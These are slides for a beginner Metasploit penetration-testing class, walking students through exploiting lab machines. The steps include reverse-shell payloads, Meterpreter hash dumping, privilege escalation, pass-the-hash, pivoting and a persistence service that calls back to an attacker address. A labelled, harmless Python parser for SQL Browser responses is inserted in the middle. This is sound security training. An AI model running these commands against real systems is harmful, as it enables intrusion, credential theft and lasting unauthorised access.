Metasploit for Penetration Testing: Beginner Class

Slides for the beginning Metasploit class.

Page 1: Metasploit for Penetration Testing: Beginner Class

Penetration Testing with Metasploit

Georgia Weidman

Page 2

Acknowledgements

• Metasploit Team

• Offensive Security/Metasploit Unleashed

• Hackers for Charity

• David Kennedy

• BSides Delaware Crew

• Darren

Page 3

Agenda

• Metasploit Basics

– Some terminology/brief intro to pentesting

– How Metasploit works

– Interacting with Metasploit

• Basic Exploitation

– Exploiting a vulnerability using Metasploit console

• Using Meterpreter

– Using the Meterpreter shell for post exploitation

Page 4

Agenda

• Metasploit in a penetration test

– Information Gathering

– Vulnerability Scanning

– Exploitation in depth

– Post exploitation

– Reporting

• Hack some stuff

– Pop my boxes

Page 5

Connecting

Wireless access point SSID: IgnatiusRiley

Password: metasploit

Page 6

What’s in the lab?

• Windows XP SP2

– IP address: 192.168.20.22

• Ubuntu Linux 8.04 (Metasploitable)

– IP address: 192.168.20.23

Others below .100 (.100 and above are you guys)

Page 7

What is Penetration Testing?

Simulation of a real attack

Get out of jail free card for exploiting systems

Report to customers with findings and recommendations

Find and remediate vulnerabilities before attackers exploit them

Page 8

What is Metasploit?

Exploitation framework

Ruby-based

Modular

Exploits, payloads, auxiliaries, and more

Page 9

Metasploit Terminology

Exploit: vector for penetrating the system

Payload: shellcode, what you want the exploit to do

Encoders: encode or mangle payload

Auxiliary: other modules besides exploitation

Session: connection from a successful exploit

Page 10

Metasploit Interfaces

Msfconsole

Msfcli

Msfweb, Msfgui (discontinued)

Metasploit Pro, Metasploit Express

Armitage

Page 11

Exploitation Streamlining

• Traditional Pentest:

– Find public exploit

– Change offsets and return address for your target

– Replace shellcode

• Metasploit:

– Load Metasploit module

– Select target OS

– Set IP addresses

– Select payload

Page 12

Using Msfconsole: Exploitation

use <module> - sets exploit/auxiliary/etc. to use

set <x X> - set a parameter

setg <x X> - set a parameter globally

show <x> - lists all available x

exploit – runs the selected module

Page 13

Windows Exploitation Example

search windows/smb

info windows/smb/ms08_067_netapi

use windows/smb/ms08_067_netapi

show payloads

set payload windows/meterpreter/reverse_tcp

show options

set lhost 192.168.20.22 (set other options as well)

exploit

Page 14

MSFcli Exploitation Example

./msfcli <exploit> <option=x> E

Example: msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.2 LHOST=192.168.1.3 PAYLOAD=windows/shell/bind_tcp E

E = exploit

O = show options

P = show payloads

Page 15

Linux Exploitation Example

search distcc

use unix/misc/distcc_exec

show payloads

set payload cmd/unix/reverse

show options

set rhost 192.168.20.23

set lhost 192.168.20.102 (your ip)

exploit

Page 16

Sessions

sessions -l – lists all active sessions

sessions -i <id> – interact with a given session

Page 17

Meterpreter

Gain a session using a meterpreter payload

Memory based/never hits the disk

Everything a shell can do plus extra

Page 18

Meterpreter Commands

help – shows all available commands

background – backgrounds the session

ps – shows all processes

migrate <process id> – moves meterpreter to another process

getuid – shows the user

Page 19

Meterpreter Commands

download <file> - pulls a file from the victim

upload <file on attacker> <file on victim> - pushes a file to the victim

hashdump – dumps the password hashes from the SAM

shell – drops you in a shell

Page 20

Exercise

In Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine.

Experiment with different payloads and meterpreter commands.

Page 21

Information Gathering

Learning as much about a target as possible

Examples: open ports, running services, installed software

Identify points for further exploration

Page 22

Metasploit and Databases

Metasploit supports MySQL and PostgreSQL

/etc/init.d/postgresql-8.4 start (starts PostgreSQL)

msf > db_connect postgres:[email protected]/metasploit (connects to the database server and creates the database metasploit)

Page 23

Portscanning

Queries a host to see if a program is listening

Ex: Browsing to a website – webserver listens on port 80

Listening ports are accessible by an attacker and if vulnerable may be used for exploitation

Ex: ms08_067_netapi exploits smb on port 445

Page 24

Metasploit and nmap

Port scanning and just about everything else

http://nmap.org/

man nmap

Ex: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1)

msf > db_import subnet1.xml

Page 25

MSF Auxiliary Portscanners

msf > search portscan (shows portscan modules)

scanner/portscan/tcp (runs a TCP syn scan)

Use auxiliary modules like exploits (use, set, exploit, etc.)

Page 26

Some Other MSF Scanners

scanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version)

scanner/ssh/ssh_version (queries the ssh version)

scanner/ftp/anonymous (anonymous ftp login)

Page 27

Vulnerability Scanning

Query systems for potential vulnerabilities

Identify potential methods of penetration

Ex: SMB version scan in information gathering returned port 445 open and target Windows XP SP2; scan for the ms08_067_netapi vulnerability

Page 28

Metasploit and Nessus

Tenable's Vulnerability Scanner (http://www.nessus.org)

msf > load nessus

msf > nessus_connect student1:[email protected] ok (ok says no ssl is ok)

msf > nessus_policy_list

msf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)

msf > nessus_report_list

msf > nessus_report_get <report id>

Page 29

Metasploit Vulnerability Scanners

SMB Login

Given a set of credentials what systems can they access?

scanner/smb/smb_login

Open VNC and X11

If misconfigured may be accessible without credentials

scanner/vnc/vnc_none_auth

scanner/x11/open_x11

Page 30

Using Msfconsole: Exploitation

use <module> - sets exploit/auxiliary/etc. to use

set <x X> - set a parameter

setg <x X> - set a parameter globally

show <x> - lists all available x

exploit – runs the selected module

Page 31

Our Database

hosts

services

vulns

-c select columns

-s search for specific string

Page 32

db_autopwn

By default just runs all the exploits that match a given open port

Not stealthy

Using vulnerability data can be made smarter, matches vulnerabilities instead of ports

db_autopwn -x -e

Page 33

Attacking MSSQL

MSSQL TCP port can change, UDP port is 1434

msf > search mssql (shows all mssql modules)

msf > use scanner/mssql/mssql_ping (queries UDP 1434 for information including the TCP port)

msf > use scanner/mssql/mssql_login (tries passwords to log into mssql)

msf > use windows/mssql/mssql_payload (logs into mssql and gets a shell)
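Added example, not part of the deck: the information mssql_ping reports comes from the SQL Server Resolution Protocol (MS-SQLR) response the SQL Browser service returns on UDP 1434. This parser decodes such a response into per-instance attributes, which shows exactly what an exposed UDP 1434 listener discloses (instance names, version, TCP port); the datagram is constructed here, and the server name, version and ports are made-up values.

```python
import struct

# Constructed SVR_RESP datagram in the MS-SQLR format the SQL Browser
# service returns on UDP 1434; server name, version and ports are
# made-up values for this example.
SSRP_DATA = (
    b"ServerName;LABSQL01;InstanceName;MSSQLSERVER;IsClustered;No;"
    b"Version;9.00.1399.06;tcp;1433;np;\\\\LABSQL01\\pipe\\sql\\query;;"
    b"ServerName;LABSQL01;InstanceName;SQLEXPRESS;IsClustered;No;"
    b"Version;9.00.1399.06;tcp;49172;;"
)
# Wire format: 1 byte type 0x05, 2-byte little-endian length, then ASCII data
SAMPLE_SSRP_RESPONSE = b"\x05" + struct.pack("<H", len(SSRP_DATA)) + SSRP_DATA

def parse_ssrp_response(datagram):
    """Decode an SSRP server response into one attribute dict per instance."""
    if len(datagram) < 3 or datagram[0] != 0x05:
        raise ValueError("not an SSRP SVR_RESP datagram")
    (length,) = struct.unpack_from("<H", datagram, 1)
    data = datagram[3:3 + length].decode("ascii", errors="replace")
    instances = []
    # Each instance block ends with ";;" and holds alternating key;value fields
    for block in data.split(";;"):
        if not block:
            continue
        fields = block.split(";")
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances

def tcp_ports(instances):
    """Map instance name to the TCP port it advertises (the port mssql_ping reports)."""
    return {i["InstanceName"]: int(i["tcp"]) for i in instances if "tcp" in i}
```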

Page 34

We have a shell, now what?

Privilege escalation

Local information gathering

Exploiting additional hosts

Maintaining access

Forensic avoidance

Page 35

Meterpreter: Privilege Escalation

A session has the privileges of the exploited process

getuid (tells you what user your session is running as)

getsystem (tries various techniques to escalate privileges)

Page 36

Meterpreter: Enabling Remote Desktop

Turn on remote desktop, get it through the firewall, put a user in the remote desktop users group

run getgui -e

Page 37

Meterpreter: Migrating

If the process that hosts meterpreter closes, meterpreter dies too

Example: client side exploit residing in the browser

meterpreter> ps (shows all processes)

meterpreter> migrate <process id> (moves to a new process)

Page 38

Meterpreter: Searching for Content

Look for specific interesting files on the exploited system

search -h

Example: search -f *.jpg (finds all the porn)

Page 39

Pivoting

Scenario: Exploit a dual-networked host with a routable interface and a non-routable one. Can we attack other hosts on the non-routable interface without SSH tunneling?

route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1)

Now you can portscan, exploit, etc. the non routable subnet

Page 40

PSExec

hashdump (dumps the hashes, not always easy to crack)

Why not just pass the hash to other systems?

use windows/smb/psexec

set SMBPass to the hash

Page 41

Meterpreter: Persistence

Persistence script installs a meterpreter service

Meterpreter comes back when the box restarts

Ex: run persistence -U -i 5 -p 443 -r 192.168.20.101 (respawns on login, at a 5 second interval, on port 443 to IP 192.168.20.101)

Page 42

Exercises

Perform a penetration test on the Windows and Linux systems we used in class

Perform a penetration test on the lab network

Page 43

Contact

Georgia Weidman

Website: http://www.grmn00bs.com

http://www.georgiaweidman.com

Email: [email protected]

Twitter: @vincentkadmon